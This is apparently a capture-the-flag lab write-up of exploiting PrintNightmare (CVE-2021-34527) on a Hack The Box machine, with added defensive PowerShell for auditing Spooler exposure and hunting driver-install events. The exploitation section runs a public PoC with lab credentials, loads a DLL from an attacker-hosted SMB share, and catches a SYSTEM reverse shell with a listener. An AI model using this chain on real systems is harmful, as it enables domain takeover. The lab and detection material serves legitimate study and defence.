CVE-2021-34527

A vulnerability has been found in Microsoft Windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx in the file spoolsv.exe of the Print Spooler Service component. Manipulation of the argument dwFileCopyFlags with an unknown input leads to an access control vulnerability. The CWE definition for the vulnerability is CWE-284: the software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. The impact is known to affect confidentiality, integrity, and availability.

Overview of CVE-2021-1675/CVE-2021-34527

Testing

The vulnerability is essentially a remote version of CVE-2021-1675.

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-rpcdump $IP | egrep 'MS-RPRN|MS-PAR'           
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol 
 
*Evil-WinRM* PS C:\tmp> Get-Service Spooler
 
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

This has already been enumerated from multiple sources, but it is confirmed here again: both print RPC interfaces are exposed and the Spooler service is running.
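The checks above are the attacker's view of the question "is the Spooler reachable?". The defender's version of the same question, added here as an example and not part of the original writeup, is an audit of the settings that decide whether a host still accepts remote driver installs: service state, the remote RPC endpoint policy, and the Point and Print policy values. The function name and the wording of the findings are mine; the registry paths and value names are the documented Print Spooler and Point and Print policy settings. Run it in an elevated PowerShell session on the host being checked.

```powershell
# Added example, not from the original writeup: audit the settings that decide
# whether a host is exposed to remote PrintNightmare-style driver installs.
# Function name and finding wording are mine; the registry paths and value names
# are the documented Print Spooler / Point and Print policy settings.

function Get-PrintSpoolerExposure {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Service state. A stopped and disabled Spooler removes the attack surface
    #    entirely; on domain controllers that is the recommended state.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $status    = if ($svc) { $svc.Status.ToString() }    else { 'NotInstalled' }
    $startType = if ($svc) { $svc.StartType.ToString() } else { 'NotInstalled' }
    if ($status -eq 'Running') { $findings.Add('Spooler service is running') }

    # 2. Remote RPC endpoint. The policy "Allow Print Spooler to accept client
    #    connections" = Disabled writes RegisterSpoolerRemoteRpcEndPoint = 2,
    #    which stops the spoolss pipe from serving MS-RPRN/MS-PAR to remote
    #    clients while local printing keeps working.
    $printersKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
    $rpc = (Get-ItemProperty -Path $printersKey -ErrorAction SilentlyContinue).RegisterSpoolerRemoteRpcEndPoint
    $remoteRpcDisabled = ($rpc -eq 2)
    if ($status -eq 'Running' -and -not $remoteRpcDisabled) {
        $findings.Add('Spooler accepts remote RPC client connections')
    }

    # 3. Point and Print driver-install policy.
    #    RestrictDriverInstallationToAdministrators absent or 1 = only
    #    administrators may add drivers (the default since the August 2021
    #    update); 0 re-enables the non-admin driver-add path.
    #    NoWarningNoElevationOnInstall = 1 or UpdatePromptSettings != 0 weaken
    #    the elevation prompts and are flagged as well.
    $pap = Get-ItemProperty -Path (Join-Path $printersKey 'PointAndPrint') -ErrorAction SilentlyContinue
    if ($pap.RestrictDriverInstallationToAdministrators -eq 0) {
        $findings.Add('RestrictDriverInstallationToAdministrators = 0 (non-admins may install drivers)')
    }
    if ($pap.NoWarningNoElevationOnInstall -eq 1) {
        $findings.Add('NoWarningNoElevationOnInstall = 1 (no elevation prompt on driver install)')
    }
    if ($null -ne $pap.UpdatePromptSettings -and $pap.UpdatePromptSettings -ne 0) {
        $findings.Add("UpdatePromptSettings = $($pap.UpdatePromptSettings) (driver-update prompts weakened)")
    }

    [pscustomobject]@{
        Host              = $env:COMPUTERNAME
        SpoolerStatus     = $status
        SpoolerStartType  = $startType
        RemoteRpcDisabled = $remoteRpcDisabled
        Findings          = $findings
        PatchLevelChecked = $false   # pair with Get-HotFix / WSUS data; policy alone is not the fix
    }
}

Get-PrintSpoolerExposure | Format-List
```

An empty Findings list on a patched host is the goal state; on a domain controller the simplest result is SpoolerStatus = Stopped with SpoolerStartType = Disabled, since nothing there needs the service.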

Exploit (PrintNightmare)

There were many trials and errors before discovering this one. The exploit was found online.

PrintNightmare allows an attacker to execute remote commands, gain full access to a domain controller and take over the whole domain, starting from user-level access. The exploit takes advantage of the Windows-native Print Spooler service, which is enabled by default on all Windows machines (servers and endpoints).

The tool used to exploit this vulnerability only requires a valid credential and one of the two RPC protocols to be enabled on the target system.

PrintNightmare works by exploiting a logic flaw in the MS-RPRN protocol's RpcAddPrinterDriverEx function, which allows underprivileged users to define their own (.dll) print drivers. These drivers are ultimately loaded by the Spooler service running as SYSTEM, which is what yields the privilege escalation.

There is another method through the MS-PAR protocol's RpcAsyncAddPrinterDriver function. It is similar to RpcAddPrinterDriverEx but has far fewer constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.
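Both paths end the same way: a driver is added through the spooler's RPC interface and the service loads the supplied DLL as SYSTEM. That leaves a trace in the Microsoft-Windows-PrintService/Operational log, which is the natural place for a responder to look. The following is an added example, not part of the original writeup: it triages that log for Event ID 316 (printer driver added or updated) and Event ID 808 (spooler failed to load a plug-in module), flagging driver adds that reference a UNC source or a driver name outside a caller-supplied allowlist. The function name, the severity labels and the three sample records are mine; the sample records are constructed, not captured from the lab. The operational log is disabled by default and has to be enabled first.

```powershell
# Added example, not from the original writeup: hunt the PrintService
# operational log for the driver-add pattern described in the text. Function
# name, severity labels and sample records are mine and constructed.
#
# The log is off by default; enable it before relying on it:
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true

function Find-SuspiciousPrintDriverEvents {
    param(
        # Pass pre-collected records (anything with Id, TimeCreated, Message)
        # to run offline; omit to query the live log of this host.
        [object[]]$Events,
        # Driver names that are expected in this environment; anything else
        # added via 316 is reported for review.
        [string[]]$KnownDrivers = @(),
        [datetime]$Since = (Get-Date).AddDays(-7)
    )
    if (-not $Events) {
        $Events = @(Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-PrintService/Operational'
            Id        = 316, 808
            StartTime = $Since
        } -ErrorAction SilentlyContinue)
    }

    foreach ($e in $Events) {
        $severity = $null
        $detail   = $null
        switch ($e.Id) {
            316 {
                # "Printer driver <name> for Windows x64 Version-3 was added or updated. Files:- ..."
                $driver = if ($e.Message -match '^Printer driver (.+?) for Windows') { $Matches[1] } else { '<unparsed>' }
                # A UNC path (\\host\share\ or the \??\UNC\ form) in the file list means the
                # spooler fetched driver code from another machine: the highest-value signal.
                if ($e.Message -match '(\\\?\?\\UNC\\|\\\\[^\\\s]+\\)') {
                    $severity = 'High'
                    $detail   = "driver '$driver' added with a UNC file source"
                } elseif ($KnownDrivers -notcontains $driver) {
                    $severity = 'Review'
                    $detail   = "driver '$driver' not in the known-driver list"
                }
            }
            808 {
                # "The print spooler failed to load a plug-in module <path>, error code <n>."
                # A failed load of a DLL under spool\drivers is typical of a payload that
                # is not a real driver; always worth a look.
                $module = if ($e.Message -match 'plug-in module (.+?), error code') { $Matches[1] } else { '<unparsed>' }
                $severity = 'High'
                $detail   = "spooler failed to load plug-in module $module"
            }
        }
        if ($severity) {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Id          = $e.Id
                Severity    = $severity
                Detail      = $detail
            }
        }
    }
}

# Constructed sample records (not real log data) so the function runs offline.
# The second and third reuse the payload name and attacker IP from the writeup.
$sample = @(
    [pscustomobject]@{ Id = 316; TimeCreated = Get-Date; Message = 'Printer driver Microsoft Print To PDF for Windows x64 Version-4 was added or updated. Files:- C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_0123456789abcdef\PrintConfig.dll. No user action is required.' }
    [pscustomobject]@{ Id = 316; TimeCreated = Get-Date; Message = 'Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, \\10.10.14.5\smb\printnightmare.dll. No user action is required.' }
    [pscustomobject]@{ Id = 808; TimeCreated = Get-Date; Message = 'The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\New\printnightmare.dll, error code 0x45A. See the event user data for context information.' }
)

# Expected: the first record is a known driver and is dropped; the second is
# High (UNC source); the third is High (failed plug-in load).
Find-SuspiciousPrintDriverEvents -Events $sample -KnownDrivers 'Microsoft Print To PDF' | Format-Table -AutoSize
```

Run without -Events on a server or domain controller and the 316 volume should be close to zero, so even the Review entries are worth reading; on print servers the KnownDrivers list does the work. The same pattern can be corroborated with Sysmon file-creation events for new DLLs under the spooler's drivers directory.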

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ python3 CVE-2021-34527.py $IP -d FABRICORP.LOCAL -u bnielson -p Qwer1234 -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.5 -share smb
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.5\smb\printnightmare.dll
 
[*] Attempting target: 10.10.10.193
[*] Connecting to ncacn_np:10.10.10.193[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_dcef07064d319714\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.5\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB Server

Launching the exploit.

I can do this remotely as any valid user. Notice that I am doing it as the bnielson user; I could have done this remotely without even gaining a foothold as the svc-print user. I love this exploit script in particular because it also hosts the payload over SMB, whereas some other exploits don't do that.

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ nnc 1234     
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.193] 49733
Windows PowerShell running as user FUSE$ on FUSE
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
Fuse
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::a503:3c1b:a607:49b2
   Link-local IPv6 Address . . . . . : fe80::a503:3c1b:a607:49b2%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

Domain Level Compromise